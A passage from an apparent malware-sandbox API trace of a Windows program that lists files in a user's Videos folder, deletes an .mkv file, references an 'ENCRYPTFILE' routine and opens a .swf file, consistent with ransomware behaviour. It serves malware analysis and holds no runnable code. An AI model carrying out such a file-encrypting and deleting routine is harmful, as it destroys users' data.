lpBuffer=0x143ea88, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\T H0jeo_wwrX\\pNrmbcA\\c1tN0jRrSKz9_ 3.mkv", lpFilePart=0x0) returned 0x4e [0103.506] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0103.506] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\T H0jeo_wwrX\\pNrmbcA\\c1tN0jRrSKz9_ 3.mkv" (normalized: "c:\\users\\fd1hvy\\videos\\kw4s-- cgxzezc\\t h0jeo_wwrx\\pnrmbca\\c1tn0jrrskz9_ 3.mkv")) returned 0x20 [0103.506] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca748 | out: hHeap=0x1780000) returned 1 [0103.506] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0103.506] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6d0 | out: hHeap=0x1780000) returned 1 [0103.506] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x40a7860 | out: hHeap=0x1780000) returned 1 [0103.506] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0103.507] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0103.507] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0103.507] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391dc8 | out: hHeap=0x1780000) returned 1 [0103.507] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0103.507] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41a5360 | out: hHeap=0x1780000) returned 1 [0103.507] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0103.507] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca580 | out: hHeap=0x1780000) returned 1 [0103.507] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0103.507] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\T H0jeo_wwrX\\pNrmbcA\\c1tN0jRrSKz9_ 3.mkv", lpFindFileData=0x144ead0 | out: lpFindFileData=0x144ead0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd59e5170, ftCreationTime.dwHighDateTime=0x1d5e54e, ftLastAccessTime.dwLowDateTime=0x3b529e30, ftLastAccessTime.dwHighDateTime=0x1d5e58c, ftLastWriteTime.dwLowDateTime=0x3b529e30, ftLastWriteTime.dwHighDateTime=0x1d5e58c, nFileSizeHigh=0x0, nFileSizeLow=0xbcb7, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="c1tN0jRrSKz9_ 3.mkv", cAlternateFileName="C1TN0J~1.MKV")) returned 0x41ac2c0 [0103.507] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\T H0jeo_wwrX\\pNrmbcA\\c1tN0jRrSKz9_ 3.mkv" (normalized: "c:\\users\\fd1hvy\\videos\\kw4s-- cgxzezc\\t h0jeo_wwrx\\pnrmbca\\c1tn0jrrskz9_ 3.mkv")) returned 1 [0103.548] FindNextFileW (in: hFindFile=0x41ac2c0, lpFindFileData=0x144ead0 | out: lpFindFileData=0x144ead0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd59e5170, ftCreationTime.dwHighDateTime=0x1d5e54e, ftLastAccessTime.dwLowDateTime=0x3b529e30, ftLastAccessTime.dwHighDateTime=0x1d5e58c, ftLastWriteTime.dwLowDateTime=0x3b529e30, ftLastWriteTime.dwHighDateTime=0x1d5e58c, nFileSizeHigh=0x0, nFileSizeLow=0xbcb7, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="c1tN0jRrSKz9_ 3.mkv", cAlternateFileName="C1TN0J~1.MKV")) returned 0 [0103.548] FindClose (in: hFindFile=0x41ac2c0 | out: hFindFile=0x41ac2c0) returned 1 [0103.549] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41a5250 | out: hHeap=0x1780000) returned 1 [0103.549] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0103.549] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca688 | out: hHeap=0x1780000) returned 1 [0103.549] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0103.549] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x40a7cf8 | out: hHeap=0x1780000) returned 1 [0103.549] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0103.549] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0103.549] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0103.549] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf950 | out: hHeap=0x1780000) returned 1 [0103.549] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0103.549] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac280 | out: hHeap=0x1780000) returned 1 [0103.549] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0103.549] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90b0 | out: hHeap=0x1780000) returned 1 [0103.549] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca430 | out: hHeap=0x1780000) returned 1 [0103.549] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca250 | out: hHeap=0x1780000) returned 1 [0103.549] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1d8 | out: hHeap=0x1780000) returned 1 [0103.549] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0103.549] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9a0 | out: hHeap=0x1780000) returned 1 [0103.549] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca418 | out: hHeap=0x1780000) returned 1 [0103.549] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0103.549] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd10 | out: hHeap=0x1780000) returned 1 [0103.549] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cc1c8 | out: hHeap=0x1780000) returned 1 [0103.550] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0103.550] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3e8 | out: hHeap=0x1780000) returned 1 [0103.550] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3b8 | out: hHeap=0x1780000) returned 1 [0103.550] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa18 | out: hHeap=0x1780000) returned 1 [0103.550] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0103.550] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0103.550] CharUpperBuffW (in: lpsz="ENCRYPTFILE", cchLength=0xb | out: lpsz="ENCRYPTFILE") returned 0xb [0103.550] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd10 | out: hHeap=0x1780000) returned 1 [0103.550] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0103.550] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1d8 | out: hHeap=0x1780000) returned 1 [0103.550] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0103.550] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41a5360 | out: hHeap=0x1780000) returned 1 [0103.550] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca250 | out: hHeap=0x1780000) returned 1 [0103.550] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797048 | out: hHeap=0x1780000) returned 1 [0103.550] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0103.550] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0103.550] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796de8 | out: hHeap=0x1780000) returned 1 [0103.550] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0103.550] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0103.550] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0103.551] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0103.551] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\T H0jeo_wwrX\\pNrmbcA\\WfuP9I.swf", lpFindFileData=0x144e970 | out: lpFindFileData=0x144e970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf4e81fc0, ftCreationTime.dwHighDateTime=0x1d5eb4d, ftLastAccessTime.dwLowDateTime=0xc760ef40, ftLastAccessTime.dwHighDateTime=0x1d5e1d5, ftLastWriteTime.dwLowDateTime=0xc760ef40, ftLastWriteTime.dwHighDateTime=0x1d5e1d5, nFileSizeHigh=0x0, nFileSizeLow=0x18cfb, dwReserved0=0x10189fc, dwReserved1=0x8, cFileName="WfuP9I.swf", cAlternateFileName="")) returned 0x41ac500 [0103.551] FindClose (in: hFindFile=0x41ac500 | out: hFindFile=0x41ac500) returned 1 [0103.551] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca460 | out: hHeap=0x1780000) returned 1 [0103.551] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca448 | out: hHeap=0x1780000) returned 1 [0103.551] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9c8 | out: hHeap=0x1780000) returned 1 [0103.551] CharUpperBuffW (in: lpsz="_WINAPI_FILEINUSE", cchLength=0x11 | out: lpsz="_WINAPI_FILEINUSE") returned 0x11 [0103.551] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391dc8 | out: hHeap=0x1780000) returned 1 [0103.551] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0103.551] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0103.551] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6d0 | out: hHeap=0x1780000) returned 1 [0103.551] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0103.551] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILEEX", cchLength=0x14 | out: lpsz="_WINAPI_CREATEFILEEX") returned 0x14 [0103.551] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391b60 | out: hHeap=0x1780000) returned 1 [0103.552] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0103.552] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0103.552] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0103.552] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0103.552] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca688 | out: hHeap=0x1780000) returned 1 [0103.552] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0103.552] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0103.552] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0103.552] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0103.552] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0103.552] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0103.552] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0103.552] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0103.552] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0103.552] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0103.552] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0103.552] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0103.553] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0103.553] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0103.553] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0103.554] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2730 | out: hHeap=0x1780000) returned 1 [0103.554] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0103.554] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0030 | out: hHeap=0x1780000) returned 1 [0103.555] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0103.555] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0103.555] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0103.555] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0103.555] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0103.555] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0103.555] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0103.555] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0103.555] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9188 | out: hHeap=0x1780000) returned 1 [0103.555] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0103.555] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0103.555] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0103.555] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0103.555] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0103.555] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0103.555] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0103.555] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0103.555] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0103.555] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0103.556] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0103.556] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0103.556] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0103.556] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2730 | out: hHeap=0x1780000) returned 1 [0103.556] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0103.556] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0103.556] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0103.556] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0103.556] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0103.556] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0103.556] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0103.556] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29b0 | out: hHeap=0x1780000) returned 1 [0103.556] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0103.556] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a80 | out: hHeap=0x1780000) returned 1 [0103.556] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0103.556] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b10 | out: hHeap=0x1780000) returned 1 [0103.556] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0103.556] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a30 | out: hHeap=0x1780000) returned 1 [0103.556] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0103.556] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29b0 | out: hHeap=0x1780000) returned 1 [0103.556] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0103.556] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ae0 | out: hHeap=0x1780000) returned 1 [0103.556] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0103.556] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a70 | out: hHeap=0x1780000) returned 1 [0103.557] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x772d0000 [0103.557] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0103.557] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca9e8 [0103.557] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x43ca9e8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileW", lpUsedDefaultChar=0x0) returned 12 [0103.557] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0103.558] GetProcAddress (hModule=0x772d0000, lpProcName="CreateFileW") returned 0x7733ed10 [0103.558] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0103.558] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b00 | out: hHeap=0x1780000) returned 1 [0103.558] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0210 [0103.558] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a00 [0103.558] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b00 [0103.558] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b10 [0103.558] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2960 [0103.558] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a40 [0103.558] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29f0 [0103.558] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2aa0 [0103.558] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20002) returned 0x4506008 [0103.558] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a00 | out: hHeap=0x1780000) returned 1 [0103.558] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b00 | out: hHeap=0x1780000) returned 1 [0103.558] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b10 | out: hHeap=0x1780000) returned 1 [0103.558] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2960 | out: hHeap=0x1780000) returned 1 [0103.558] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a40 | out: hHeap=0x1780000) returned 1 [0103.558] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29f0 | out: hHeap=0x1780000) returned 1 [0103.558] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2aa0 | out: hHeap=0x1780000) returned 1 [0103.558] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0210 | out: hHeap=0x1780000) returned 1 [0103.558] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\T H0jeo_wwrX\\pNrmbcA\\WfuP9I.swf" (normalized: "c:\\users\\fd1hvy\\videos\\kw4s-- cgxzezc\\t h0jeo_wwrx\\pnrmbca\\wfup9i.swf"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x258 [0103.559] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29d0 [0103.559] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43ea730 [0103.559] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff90 [0103.559] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0103.559] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca838 [0103.559] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac40 [0103.559] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b10 [0103.559] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac40 | out: hHeap=0x1780000) returned 1 [0103.559] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b10 | out: hHeap=0x1780000) returned 1 [0103.559] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0103.559] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca838 [0103.559] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab80 [0103.559] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad30 [0103.559] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29a0 [0103.559] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad30 | out: hHeap=0x1780000) returned 1 [0103.559] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x90) returned 0x4050e78 [0103.559] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4506008 | out: hHeap=0x1780000) returned 1 [0103.559] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaa8 [0103.559] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac40 [0103.559] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad78 [0103.559] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2aa0 [0103.560] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad78 | out: hHeap=0x1780000) returned 1 [0103.560] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2aa0 | out: hHeap=0x1780000) returned 1 [0103.560] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac40 | out: hHeap=0x1780000) returned 1 [0103.560] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabf8 [0103.560] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac40 [0103.560] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caca0 [0103.560] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a40 [0103.560] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caca0 | out: hHeap=0x1780000) returned 1 [0103.560] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a40 | out: hHeap=0x1780000) returned 1 [0103.560] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac40 | out: hHeap=0x1780000) returned 1 [0103.560] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabb0 [0103.560] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab20 [0103.560] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab98 [0103.560] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ab0 [0103.560] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab98 | out: hHeap=0x1780000) returned 1 [0103.560] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, 